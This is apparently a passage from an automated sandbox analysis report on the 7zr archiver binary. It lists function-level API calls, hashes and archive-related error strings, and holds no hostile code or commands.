                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: _initterm$__getmainargs__p___initenv__p__commode__p__fmode__set_app_type
                          • String ID:
                          • API String ID: 4012487245-0
                          • Opcode ID: ccad3039bb3a2cd44b6ef38cfe1a5d711a88043cb502be024989bca561bfa4cb
                          • Instruction ID: 8f3c27acc0c8ca9d4a47c2fab01b1bff70b9d9f0cd4e3177029eb1a69cf791e6
                          • Opcode Fuzzy Hash: ccad3039bb3a2cd44b6ef38cfe1a5d711a88043cb502be024989bca561bfa4cb
                          • Instruction Fuzzy Hash: EC215B75910618FFDB249FE4EC4AA9DBBB8FB0AB20F100255F111A22E2C7745565CF60

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: _initterm$FilterXcpt__getmainargs__p___initenv__setusermatherr_controlfpexit
                          • String ID:
                          • API String ID: 279829931-0
                          • Opcode ID: 11c6eee75e368aae7d8cf1334b66372271fac9d1f9bbf5e6b4cee7235e3a970d
                          • Instruction ID: f2497637d397f8bb70fa48770bca89f4f1c8ca38e6623a27e8a715b2fdff53ae
                          • Opcode Fuzzy Hash: 11c6eee75e368aae7d8cf1334b66372271fac9d1f9bbf5e6b4cee7235e3a970d
                          • Instruction Fuzzy Hash: 6E01E975920618EFDB189FE0EC8ACEE7BB9FF0D700B101059F505A2262DB759965CF20

                          Control-flow Graph

                          APIs
                          • __EH_prolog.LIBCMT ref: 001A185D
                            • Part of subcall function 001A021A: __EH_prolog.LIBCMT ref: 001A021F
                            • Part of subcall function 001A062E: __EH_prolog.LIBCMT ref: 001A0633
                          • _CxxThrowException.MSVCRT(?,00236010), ref: 001A1961
                            • Part of subcall function 001A1AA5: __EH_prolog.LIBCMT ref: 001A1AAA
                          Strings
                          • Duplicate archive path:, xrefs: 001A1A8D
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog$ExceptionThrow
                          • String ID: Duplicate archive path:
                          • API String ID: 2366012087-4000988232
                          • Opcode ID: e01a89427951463436aa4b83f83cf8a239d949778df3ee4087b95f648ab4e373
                          • Instruction ID: d41cc09580e63e3f47dbbb088411bbc98611752ab61e4b27ab15261ece1c611e
                          • Opcode Fuzzy Hash: e01a89427951463436aa4b83f83cf8a239d949778df3ee4087b95f648ab4e373
                          • Instruction Fuzzy Hash: 40815A35D00259EFCF15EFA4D995ADEBBB5AF29310F1040A9E416B7292DB30AE05CF60

                          Control-flow Graph (function at 186c72; rendered graph not reproduced, legend: Executed / Not Executed)
                          APIs
                          • __EH_prolog.LIBCMT ref: 00186C77
                          • SetLastError.KERNEL32(00000002,-00000050,0000000F,-00000038,:$DATA,?,00000000,?), ref: 00186EC9
                            • Part of subcall function 00186C72: wcscmp.MSVCRT ref: 001870A5
                            • Part of subcall function 00186BF5: __EH_prolog.LIBCMT ref: 00186BFA
                            • Part of subcall function 00186BF5: GetFileAttributesW.KERNEL32(?,?,?,00000000,?), ref: 00186C1A
                            • Part of subcall function 00186BF5: GetFileAttributesW.KERNEL32(?,00000000,?,?,00000000,?), ref: 00186C49
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: AttributesFileH_prolog$ErrorLastwcscmp
                          • String ID: :$DATA
                          • API String ID: 3316598575-2587938151
                          • Opcode ID: e7787084bcc2cd7474a69dc518049a31fd8513245e4a4af70b2d266f6044561b
                          • Instruction ID: 352b710c7585c2aa98ba2392f8b08bd22de6dbc7957d91d7953b2b75f928c8b0
                          • Opcode Fuzzy Hash: e7787084bcc2cd7474a69dc518049a31fd8513245e4a4af70b2d266f6044561b
                          • Instruction Fuzzy Hash: DAE136319006099ACF26FFA4C895BEEB7B1BF25314F20451DE8866B2D1DB70AB49CF51
                          APIs
                          • __EH_prolog.LIBCMT ref: 00196FCA
                            • Part of subcall function 00196E71: __EH_prolog.LIBCMT ref: 00196E76
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID: Incorrect reparse stream$Unknown reparse stream$can't delete file
                          • API String ID: 3519838083-394804653
                          • Opcode ID: 9b86ced7a0264fb2528801feae4fca01859932b0b6efba4200313e03c1596f14
                          • Instruction ID: 630c8358b74f2115d7fca32efa4d71994b8f8eddbd86b89a0a4a8be3b95b484a
                          • Opcode Fuzzy Hash: 9b86ced7a0264fb2528801feae4fca01859932b0b6efba4200313e03c1596f14
                          • Instruction Fuzzy Hash: 8341D672D19284EBCF25DFA484919EEFBF5BF5A300F58446EE086A3281C7306E45CB61
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: fputs$H_prolog
                          • String ID: =
                          • API String ID: 2614055831-2525689732
                          • Opcode ID: 9dbc51791501bebbe450a8a8a9563e137050de5b9ed039651e11b53eb163c5fa
                          • Instruction ID: a41cb7edd32e71d005a9aab813b46b94a8a578e1ecc89b391e53c2f7b04480d3
                          • Opcode Fuzzy Hash: 9dbc51791501bebbe450a8a8a9563e137050de5b9ed039651e11b53eb163c5fa
                          • Instruction Fuzzy Hash: 24218E32904118EBCF1AFB94E942AEDBBB9EF68710F20002AE40172191DF716F55CF90
                          APIs
                          • __EH_prolog.LIBCMT ref: 001CBDBA
                            • Part of subcall function 001CBE69: __EH_prolog.LIBCMT ref: 001CBE6E
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID: "$0"$D"
                          • API String ID: 3519838083-338471513
                          • Opcode ID: c90d782168a49c95bffdd6bfb99f1fc6a41c6f9363d72c6deca8613163ce6630
                          • Instruction ID: c178ee0926b9f6bd562014b6e318714b2e8c7fa8f22934e4d2f8e8606f6a6b09
                          • Opcode Fuzzy Hash: c90d782168a49c95bffdd6bfb99f1fc6a41c6f9363d72c6deca8613163ce6630
                          • Instruction Fuzzy Hash: 1211E6B0911B54DFC721DF99D588A86FBE4BF28304F55C86ED0AE87712C7B0A968CB50
                          APIs
                          • __EH_prolog.LIBCMT ref: 001B8346
                          • fputs.MSVCRT ref: 001B835B
                          • fputs.MSVCRT ref: 001B8364
                            • Part of subcall function 001B83BF: __EH_prolog.LIBCMT ref: 001B83C4
                            • Part of subcall function 001B83BF: fputs.MSVCRT ref: 001B8401
                            • Part of subcall function 001B83BF: fputs.MSVCRT ref: 001B8437
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: fputs$H_prolog
                          • String ID: =
                          • API String ID: 2614055831-2525689732
                          • Opcode ID: 429c1cf83c663074873fab087b99baf0b000ff89a15e30756f4e4ae1f7b37fd4
                          • Instruction ID: 456a9af49aea34a51e3a2c00f7f26df4e404be13be76379ff2b286043450fade
                          • Opcode Fuzzy Hash: 429c1cf83c663074873fab087b99baf0b000ff89a15e30756f4e4ae1f7b37fd4
                          • Instruction Fuzzy Hash: 23018632A04014BBCF16BBA4D852AEDBBB9EF94B54F00401AF505921A1CF754B56DFD1
                          APIs
                          • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,00000000,0019AB57), ref: 00217DAA
                          • GetLastError.KERNEL32(?,00000000,0019AB57), ref: 00217DBB
                          • CloseHandle.KERNELBASE(00000000,?,00000000,0019AB57), ref: 00217DCF
                          • GetLastError.KERNEL32(?,00000000,0019AB57), ref: 00217DD9
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: ErrorLast$CloseHandleObjectSingleWait
                          • String ID:
                          • API String ID: 1796208289-0
                          • Opcode ID: c7e700df2c840ac292cfb3b117ad34f6a76969f39ca5b3fbde22c339ec2e45d2
                          • Instruction ID: bfaa9bbaf8dcb2fa3d17a6374573207523be3372a49d5d0a7fdd937ae16ca5b8
                          • Opcode Fuzzy Hash: c7e700df2c840ac292cfb3b117ad34f6a76969f39ca5b3fbde22c339ec2e45d2
                          • Instruction Fuzzy Hash: 0FF0FE7132820B57EB305EBDBC88FB666F8AFA5374B300769E965D21D0DF60DC918660
                          APIs
                          • EnterCriticalSection.KERNEL32(00242938), ref: 001B588B
                          • LeaveCriticalSection.KERNEL32(00242938), ref: 001B58BC
                            • Part of subcall function 001BC911: GetTickCount.KERNEL32 ref: 001BC926
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: CriticalSection$CountEnterLeaveTick
                          • String ID: v$8)$
                          • API String ID: 1056156058-815355827
                          • Opcode ID: 432a31a053d896b346c76f62c50e61f5161cfb38ecbfc1a855cb4580b0a45592
                          • Instruction ID: db96f41a3ba16420d28c22c4c213001fd48080fcf214d135285cfc23eef8054f
                          • Opcode Fuzzy Hash: 432a31a053d896b346c76f62c50e61f5161cfb38ecbfc1a855cb4580b0a45592
                          • Instruction Fuzzy Hash: FDE06575605210EFC308EF19E908E8A37A6AFE8311F01056EF40987362CB308949CAA1
                          APIs
                          • __EH_prolog.LIBCMT ref: 001A209B
                            • Part of subcall function 0018757D: GetLastError.KERNEL32(0018D14C), ref: 0018757D
                            • Part of subcall function 001A2C6C: __EH_prolog.LIBCMT ref: 001A2C71
                            • Part of subcall function 00181E40: free.MSVCRT ref: 00181E44
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog$ErrorLastfree
                          • String ID: Cannot find archive file$The item is a directory
                          • API String ID: 683690243-1569138187
                          • Opcode ID: 44a094d601d171ef504a3d1827a166dd160373eab644da2033d799b074c470a3
                          • Instruction ID: f6bf2da0a55747454ff0d4578e5890be0c35c63e4815cf08a7fea82dbf1813ee
                          • Opcode Fuzzy Hash: 44a094d601d171ef504a3d1827a166dd160373eab644da2033d799b074c470a3
                          • Instruction Fuzzy Hash: 49724774D00258DFCB26DFA8C984BDEBBB5BF5A304F14409AE859A7252C7709E81CF51
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: CountTickfputs
                          • String ID: .
                          • API String ID: 290905099-4150638102
                          • Opcode ID: febe54ee0760ae8f8829288900aec03b0467e85fbc7351473415be7a5ac7a126
                          • Instruction ID: cf6154d643476265906680089411356dc6b71326f57ebd93bb8831994791148e
                          • Opcode Fuzzy Hash: febe54ee0760ae8f8829288900aec03b0467e85fbc7351473415be7a5ac7a126
                          • Instruction Fuzzy Hash: B5714830600B049FDB26EF68C591AAEB7F6AF91704F10481DE49797A81DB70BA49CF51
                          APIs
                            • Part of subcall function 00189C8F: GetModuleHandleA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 00189CB3
                            • Part of subcall function 00189C8F: GetProcAddress.KERNEL32(00000000), ref: 00189CBA
                            • Part of subcall function 00189C8F: GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 00189CC8
                          • __aulldiv.LIBCMT ref: 001C093F
                          • __aulldiv.LIBCMT ref: 001C094B
                          Strings
                          Similarity
                          • API ID: __aulldiv$AddressGlobalHandleMemoryModuleProcStatus
                          • String ID: 3333
                          • API String ID: 3520896023-2924271548
                          • Opcode ID: aa80bea9d6c22138b4e28b4c2bf2419a07f06abe99e39d7f84be716b64eca7ac
                          • Instruction ID: f39c447217e7ba0164ffadd2e430aae1685f09a42d6d961f151743077944c802
                          • Opcode Fuzzy Hash: aa80bea9d6c22138b4e28b4c2bf2419a07f06abe99e39d7f84be716b64eca7ac
                          • Instruction Fuzzy Hash: DF21BCB1900704AFE734DF698881B5BFAFDEB58754F14492EB14AD3241D770D9408B55
                          APIs
                            • Part of subcall function 00181E40: free.MSVCRT ref: 00181E44
                          • memset.MSVCRT ref: 001AAEBA
                          • memset.MSVCRT ref: 001AAECD
                            • Part of subcall function 001C04D2: _CxxThrowException.MSVCRT(?,00234A58), ref: 001C04F8
                          Strings
                          Similarity
                          • API ID: memset$ExceptionThrowfree
                          • String ID: Split
                          • API String ID: 1404239998-1882502421
                          • Opcode ID: 70efcf6434bb248cbe6d9a1f76d08a90a4d1a4bae5bc2bbe6ea21dcab3aaf7fb
                          • Instruction ID: ddc90c6146a59a427cb6540c1754afbffb239e8eab6096267d59a9a8e9fc2094
                          • Opcode Fuzzy Hash: 70efcf6434bb248cbe6d9a1f76d08a90a4d1a4bae5bc2bbe6ea21dcab3aaf7fb
                          • Instruction Fuzzy Hash: 77426C74A00248DFDF25DFA4C984BEDBBB5BF1A314F5440A9E449A7252CB31AE85CF12
                          APIs
                          • __EH_prolog.LIBCMT ref: 0018759F
                            • Part of subcall function 0018764C: CloseHandle.KERNELBASE(00000000,?,001875AF,00000002,?,00000000,00000000), ref: 00187657
                          • CreateFileW.KERNELBASE(00000000,00000000,?,00000000,00000002,00000000,00000000,?,00000000,00000002,?,00000000,00000000), ref: 001875E5
                          • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,00000000,?,00000000,00000002), ref: 00187626
                          Similarity
                          • API ID: CreateFile$CloseH_prologHandle
                          • String ID:
                          • API String ID: 449569272-0
                          • Opcode ID: dd4d930fb37a77e7241e59b3c3d1e87cb94a48881c8033fe256ae24f55555f3b
                          • Instruction ID: 06d6d32b19cb70aad39c1edfc8d33c73cd987aa36777fa59b7b066b8c0c39956
                          • Opcode Fuzzy Hash: dd4d930fb37a77e7241e59b3c3d1e87cb94a48881c8033fe256ae24f55555f3b
                          • Instruction Fuzzy Hash: F9117F7280420AEFCF11AFA8DC418EEBB7AFF54354B208929F960561A1D7359E61EF50
                          APIs
                          • fputs.MSVCRT ref: 001B8437
                          • fputs.MSVCRT ref: 001B8401
                            • Part of subcall function 00181FB3: __EH_prolog.LIBCMT ref: 00181FB8
                          • __EH_prolog.LIBCMT ref: 001B83C4
                            • Part of subcall function 00181FA0: fputc.MSVCRT ref: 00181FA7
                          Similarity
                          • API ID: H_prologfputs$fputc
                          • String ID:
                          • API String ID: 678540050-0
                          • Opcode ID: a250cd2d6abe2eeca0eebba4f2e8e052005b9f75f87420f625722a9bd74c50c7
                          • Instruction ID: 69cf502fce45e1407181ea615920a7844b70d5209bbc96b2a6e66d33fa79d142
                          • Opcode Fuzzy Hash: a250cd2d6abe2eeca0eebba4f2e8e052005b9f75f87420f625722a9bd74c50c7
                          • Instruction Fuzzy Hash: B3118632B081156BCB0AB7A0E9136AEBB7AEF64750F100029F501926D1DF651A56CFD4
                          APIs
                          • SetFilePointer.KERNELBASE(00000002,?,00000000,?,00000002,00000002,?,00000002,?,001877DB,?,?,00000000,?,00187832,?), ref: 00187773
                          • GetLastError.KERNEL32(?,001877DB,?,?,00000000,?,00187832,?,?,?,?,00000000), ref: 00187780
                          • SetLastError.KERNEL32(00000000,?,?,001877DB,?,?,00000000,?,00187832,?,?,?,?,00000000), ref: 00187797
                          Similarity
                          • API ID: ErrorLast$FilePointer
                          • String ID:
                          • API String ID: 1156039329-0
                          • Opcode ID: d1fdace9cfb7f1f654f3d3bb6473814bbf8a011aa5565520f411d93b8e0bb7a5
                          • Instruction ID: f501d4177ef95692dd28794be485bec6bf7ecf7dd50d06eb19b180f06d69fada
                          • Opcode Fuzzy Hash: d1fdace9cfb7f1f654f3d3bb6473814bbf8a011aa5565520f411d93b8e0bb7a5
                          • Instruction Fuzzy Hash: 8411BF71604305AFEF25AFA8DC49BAE7BE5AF44320F208429F81697291D7B0DE50DF50
                          APIs
                          • __EH_prolog.LIBCMT ref: 00185A91
                          • SetFileAttributesW.KERNELBASE(?,?,?,?,00000000), ref: 00185AB7
                          • SetFileAttributesW.KERNEL32(?,?,00000000,?,?,00000000), ref: 00185AEC
                          Similarity
                          • API ID: AttributesFile$H_prolog
                          • String ID:
                          • API String ID: 3790360811-0
                          • Opcode ID: 917d414b03061915a70fc2dca9042d5dc2afc8ce38115a29467f68f51eeeb2b5
                          • Instruction ID: e16e2615cb4119d63f9d00b115887d4f893c21a1e8ddeb0e501e603f252b3ce6
                          • Opcode Fuzzy Hash: 917d414b03061915a70fc2dca9042d5dc2afc8ce38115a29467f68f51eeeb2b5
                          • Instruction Fuzzy Hash: D8019232E00615ABCF19BBA4A9C16BEB77BEF64350F144426EC11A3191CB354E16DF50
                          APIs
                          • __EH_prolog.LIBCMT ref: 00195BEF
                            • Part of subcall function 001954C0: __EH_prolog.LIBCMT ref: 001954C5
                            • Part of subcall function 00195630: __EH_prolog.LIBCMT ref: 00195635
                            • Part of subcall function 001A36EA: __EH_prolog.LIBCMT ref: 001A36EF
                            • Part of subcall function 001957C1: __EH_prolog.LIBCMT ref: 001957C6
                            • Part of subcall function 001958BE: __EH_prolog.LIBCMT ref: 001958C3
                          Strings
                          • Cannot seek to begin of file, xrefs: 0019610F
                          Similarity
                          • API ID: H_prolog
                          • String ID: Cannot seek to begin of file
                          • API String ID: 3519838083-2298593816
                          • Opcode ID: 36482d86404c6f28527af389d77e287806f36db2ff6b8b70d7a1b4323241917f
                          • Instruction ID: f727df0d9730dfa6b5276d325e28963343f8a11620860fa60e7fdf26e3c4836a
                          • Opcode Fuzzy Hash: 36482d86404c6f28527af389d77e287806f36db2ff6b8b70d7a1b4323241917f
                          • Instruction Fuzzy Hash: 671211319046499FDF26EFA4C884BEEBBF6AF64314F14006DE44667292CB70AE45CB61
                          APIs
                          • __EH_prolog.LIBCMT ref: 001C4E8F
                            • Part of subcall function 0018965D: VariantClear.OLEAUT32(?), ref: 0018967F
                            • Part of subcall function 00181E40: free.MSVCRT ref: 00181E44
                          Strings
                          Similarity
                          • API ID: ClearH_prologVariantfree
                          • String ID: file
                          • API String ID: 904627215-2359244304
                          • Opcode ID: a56887283a1b55e049601f952063ace0af228878ec68383cbc95d9b90085e014
                          • Instruction ID: 1d8dc1efacfe3ac0ed5db73534826480368f72fb193ec01deff60de21f407961
                          • Opcode Fuzzy Hash: a56887283a1b55e049601f952063ace0af228878ec68383cbc95d9b90085e014
                          • Instruction Fuzzy Hash: 3B125A31900649EBCF16EFA4C995AEDBBB6BF64344F24406CE405AB252DB71AE46CF10
                          APIs
                          • __EH_prolog.LIBCMT ref: 001A2CE0
                            • Part of subcall function 00185E10: __EH_prolog.LIBCMT ref: 00185E15
                            • Part of subcall function 001941EC: _CxxThrowException.MSVCRT(?,00234A58), ref: 0019421A
                            • Part of subcall function 0018965D: VariantClear.OLEAUT32(?), ref: 0018967F
                          Strings
                          • Cannot create output directory, xrefs: 001A3070
                          Similarity
                          • API ID: H_prolog$ClearExceptionThrowVariant
                          • String ID: Cannot create output directory
                          • API String ID: 814188403-1181934277
                          • Opcode ID: 2b089894c262a7e42057309badd93efe9e54dae170d4daacecb586567735505e
                          • Instruction ID: ab03e4235df27a97b98589581350e6caea085fb014d0574f4b049bfa064e1f8d
                          • Opcode Fuzzy Hash: 2b089894c262a7e42057309badd93efe9e54dae170d4daacecb586567735505e
                          • Instruction Fuzzy Hash: A6F1B575904289EFCF25EFA8C990AEDBBB5BF2A300F1440ADF44567252DB309E45CB51
                          APIs
                          • fputs.MSVCRT ref: 001BC840
                            • Part of subcall function 001825CB: _CxxThrowException.MSVCRT(?,00234A58), ref: 001825ED
                          Strings
                          Similarity
                          • API ID: ExceptionThrowfputs
                          • String ID:
                          • API String ID: 1334390793-399585960
                          • Opcode ID: 40e384ae9f320b07aab40d7630dc7c858fb1feedf0086b6db92ffe4ce3486561
                          • Instruction ID: 9331d909d4207d4b15051e703b95f28b047ddb78d7b0d28e0a374144c3153312
                          • Opcode Fuzzy Hash: 40e384ae9f320b07aab40d7630dc7c858fb1feedf0086b6db92ffe4ce3486561
                          • Instruction Fuzzy Hash: 51110171604740AFDB25CF58C8C1BAAFBE6EF49304F04446EE1868B240CBB1BD04CBA0
                          APIs
                          Strings
                          Similarity
                          • API ID: fputs
                          • String ID: Open
                          • API String ID: 1795875747-71445658
                          • Opcode ID: 3c94b8cc66ea9f610dfb4eee6d5a8025736869da263ec2914987521a7176628f
                          • Instruction ID: 528c053886ad5c9b3582782a20ffa89f58cbbdf6fa1588ca4a1f29a936a51b4b
                          • Opcode Fuzzy Hash: 3c94b8cc66ea9f610dfb4eee6d5a8025736869da263ec2914987521a7176628f
                          • Instruction Fuzzy Hash: 2A11A072101704EFC760EF74ED96ADABBA5EF64310F50853EE59A83212DB35A904CF50
                          APIs
                          • __EH_prolog.LIBCMT ref: 001958C3
                            • Part of subcall function 00186C72: __EH_prolog.LIBCMT ref: 00186C77
                            • Part of subcall function 00181E40: free.MSVCRT ref: 00181E44
                          Similarity
                          • API ID: H_prolog$free
                          • String ID:
                          • API String ID: 2654054672-0
                          • Opcode ID: 55494db77bb1ad2cd9c3dc7664c6a6ba6b557f32c5a5a8cc64b418279932a56a
                          • Instruction ID: 332f6e47a01d728bd2ae38b43c6d0143b7f4982859edadbb513d200cbd6f13ef
                          • Opcode Fuzzy Hash: 55494db77bb1ad2cd9c3dc7664c6a6ba6b557f32c5a5a8cc64b418279932a56a
                          • Instruction Fuzzy Hash: D791E331900905AFDF27EBE4D881AEEBBB7EF64354F244068E942B7251DB315E45CBA0
                          APIs
                          • __EH_prolog.LIBCMT ref: 001D06B3
                          • _CxxThrowException.MSVCRT(?,0023D480), ref: 001D08F2
                            • Part of subcall function 00181E0C: malloc.MSVCRT ref: 00181E1F
                            • Part of subcall function 00181E0C: _CxxThrowException.MSVCRT(?,00234B28), ref: 00181E39
                          Similarity
                          • API ID: ExceptionThrow$H_prologmalloc
                          • String ID:
                          • API String ID: 3044594480-0
                          • Opcode ID: 8403ddd8af256917fdb82dbe1d32d9f3f6de8f10c8a805e6d69d4f5ee9e16c38
                          • Instruction ID: 28225a504ab3dd1b6120c93fe18922b99762c4312329a022c2b2d70787feee94
                          • Opcode Fuzzy Hash: 8403ddd8af256917fdb82dbe1d32d9f3f6de8f10c8a805e6d69d4f5ee9e16c38
                          • Instruction Fuzzy Hash: 7C913A71D00249DFCB22DFA8C891BEEBBB5BF18304F14409AE449A7252C730AE45DF61
                          APIs
                          Similarity
                          • API ID: H_prolog
                          • String ID:
                          • API String ID: 3519838083-0
                          • Opcode ID: 6f48ca98c9bfe6c011cf7d64b65487c15b6cecc2133537561ba3cf855fcebbd4
                          • Instruction ID: 8918cdf0f578a980fcb8ff89d5ef219e55a5063eb93aedfd9bfbcec5a590d878
                          • Opcode Fuzzy Hash: 6f48ca98c9bfe6c011cf7d64b65487c15b6cecc2133537561ba3cf855fcebbd4
                          • Instruction Fuzzy Hash: D4519F74518B80AFDF25DF64C490AEABBF1BF55300F18889DE4D64B282C730BA84DB50
                          APIs
                          • __EH_prolog.LIBCMT ref: 001A7B4D
                          • memcpy.MSVCRT(00000000,002427DC,00000000,00000000,?,?,00000000,00000000,00000000,00000002), ref: 001A7C65
                          Similarity
                          • API ID: H_prologmemcpy
                          • String ID:
                          • API String ID: 2991061955-0
